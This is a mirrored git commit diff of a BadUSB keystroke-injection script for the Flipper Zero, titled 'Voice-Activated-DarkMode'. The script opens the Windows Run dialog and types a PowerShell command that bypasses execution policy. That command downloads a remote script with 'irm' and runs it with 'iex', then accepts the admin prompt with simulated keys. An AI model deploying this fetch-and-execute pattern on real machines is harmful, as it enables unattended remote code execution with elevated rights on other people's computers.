mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-05 20:40:14 -08:00
Update Voice-Activated-DarkMode.txt
This commit is contained in:
@@ -6,13 +6,10 @@ REM Target: Windows 10
|
||||
REM *REQUIREMENTS*
|
||||
REM admin required for disable USB function.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
REM open powershell
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -Exec Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Voice-Activated-DarkMode/main.ps1 | iex
|
||||
STRING powershell -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Voice-Activated-DarkMode/main.ps1 | iex
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 2500
|
||||
ALT y
|
||||
|
||||
Reference in New Issue
Block a user